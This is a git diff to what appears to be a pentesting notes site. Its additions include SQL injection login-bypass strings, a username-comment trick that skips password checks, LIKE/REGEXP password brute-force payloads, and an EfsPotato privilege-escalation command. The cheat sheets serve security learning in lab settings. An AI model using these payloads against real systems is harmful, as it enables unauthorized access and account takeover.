diff --git a/src/exploit/cryptography/algorithm/rsa.md b/src/exploit/cryptography/algorithm/rsa.md
index f1abd48..442b9a8 100644
--- a/src/exploit/cryptography/algorithm/rsa.md
+++ b/src/exploit/cryptography/algorithm/rsa.md
@@ -4,7 +4,7 @@ description: RSA is a public-key cryptosystem that is widely used for secure dat
tags:
- Cryptography
refs:
-date: 2023-09-07
+date: 2024-03-08
draft: false
---
@@ -23,10 +23,10 @@ class RSA:
self.q = getPrime(512)
# calculate n (n is used for both the public key (n, e) and the private key (n, d))
- self.n = p * q
+ self.n = self.p * self.q
# calculate t (totient, or called as 'phi')
- self.t = (p - 1) * (q - 1)
+ self.t = (self.p - 1) * (self.q - 1)
# calculate e (e is one of the puclic key (n, e))
for i in range(2, self.t):
diff --git a/src/exploit/reconnaissance/osint/osint.md b/src/exploit/reconnaissance/osint/index.md
similarity index 97%
rename from src/exploit/reconnaissance/osint/osint.md
rename to src/exploit/reconnaissance/osint/index.md
index c752c54..f67f907 100644
--- a/src/exploit/reconnaissance/osint/osint.md
+++ b/src/exploit/reconnaissance/osint/index.md
@@ -7,7 +7,7 @@ tags:
- Reconnaissance
- Web
refs:
-date: 2024-01-18
+date: 2024-03-08
draft: false
---
@@ -39,6 +39,7 @@ draft: false
- [urlscan.io](https://urlscan.io/)
- [ViewDNS.info](https://viewdns.info/)
- [Wappalyzer](https://www.wappalyzer.com/)
+- [Web Check](https://web-check.xyz/)
- [Whoxy](https://www.whoxy.com/)
- [WhoisXML](https://www.whoisxmlapi.com/)
diff --git a/src/exploit/web/method/web-login-bypass.md b/src/exploit/web/method/web-login-bypass.md
index 0d30972..1ca612f 100644
--- a/src/exploit/web/method/web-login-bypass.md
+++ b/src/exploit/web/method/web-login-bypass.md
@@ -6,7 +6,7 @@ tags:
- Web
refs:
- https://tryhackme.com/room/nosqlinjectiontutorial
-date: 2024-02-08
+date: 2024-03-08
draft: false
---
@@ -43,41 +43,43 @@ root:password
## SQL Injections
+Try the following inputs in the form.
+
```txt
+'
+'--
+'-- -
+'#
+}'
+}'--
+}'-- -
+}'#
+' or 1=1
+' or 1=1--
+' or 1=1-- -
' or '1'='1
' or '1'='1--
-or true--
+' or '1'='1-- -
' or true--
+' or true-- -
+or true--
-UNION SELECT null--
-' UNION SELECT null--
+' UNION SELECT NULL--
+' UNION SELECT NULL,NULL--
' UNION SELECT 1,2--
+UNION SELECT NULL--
```
-### Microsoft, Oracle, PostgreSQL
+### Password Omitting
-```txt
-'--
-' or 1=1--
-' or '1'='1'--
+If we know the username of an existing account, try to add prefix `'-- -` to the username for forcing the server internally to omit the password.
-}" or 1=1--
+```bash
+username: john'-- -
+password: password123 (arbitrary value)
```
-### MySQL
-
-```txt
-'-- -
-'#
-
-' or 1=1#
-' or 1=1-- -
-
-' or '1'='1'-- -
-' or '1'='1'#
-
-}" or 1=1-- -
-```
+When the login is successful, not only can we log in with that user, but we can also fuzz with other usernames.
diff --git a/src/exploit/web/security-risk/sql-injection-cheat-sheet.md b/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
index b3446d2..9d1cf19 100644
--- a/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
+++ b/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
@@ -10,7 +10,7 @@ refs:
- https://portswigger.net/web-security/sql-injection/blind
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
- https://tryhackme.com/room/adventofcyber2023
-date: 2024-02-13
+date: 2024-03-08
draft: false
---
@@ -72,12 +72,11 @@ Comment syntax is depending on the database used in the website.
|SQLite|`--`|
||`/*comment*/`|
-
## Basic Injection
-First off, check if we can inject SQL commands into forms or URL params in the target website.
+Check if we can inject SQL commands into forms or URL params in the target website.
```txt
' OR 1=1--
@@ -109,7 +108,9 @@ admin or 1=1-- -
admin or 1=1#
```
-### Blind Injection - Timing
+
+
+## Blind Injection - Timing
Reference: [https://book.hacktricks.xyz/pentesting-web/sql-injection#confirming-with-timing](https://book.hacktricks.xyz/pentesting-web/sql-injection#confirming-with-timing)
@@ -137,6 +138,18 @@ test' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))
+## Brute Force Values
+
+```html
+' password LIKE '%'-- -
+' password LIKE BINARY '%'-- -
+
+' password REGEXP '^[a-z]*'-- -
+' password REGEXP BINARY '^[a-z]*'-- -
+```
+
+
+
## WAF Bypass
Reference: [https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF](https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF)
diff --git a/src/exploit/windows/privilege-escalation/windows-privesc-with-localpotato.md b/src/exploit/windows/privilege-escalation/windows-privesc-with-localpotato.md
index 01ae66c..2c89673 100644
--- a/src/exploit/windows/privilege-escalation/windows-privesc-with-localpotato.md
+++ b/src/exploit/windows/privilege-escalation/windows-privesc-with-localpotato.md
@@ -11,10 +11,26 @@ refs:
- https://tryhackme.com/room/localpotato
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer
- https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
-date: 2023-10-26
+date: 2024-03-08
draft: false
---
+## EfsPotato
+
+### Required Privilege
+
+- `SeImpersonatePrivilege`
+
+### Payloads
+
+- [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)
+
+```bash
+EfsPotato "cmd.exe /c whoami"
+```
+
+
+
## GodPotato
### Required Privileges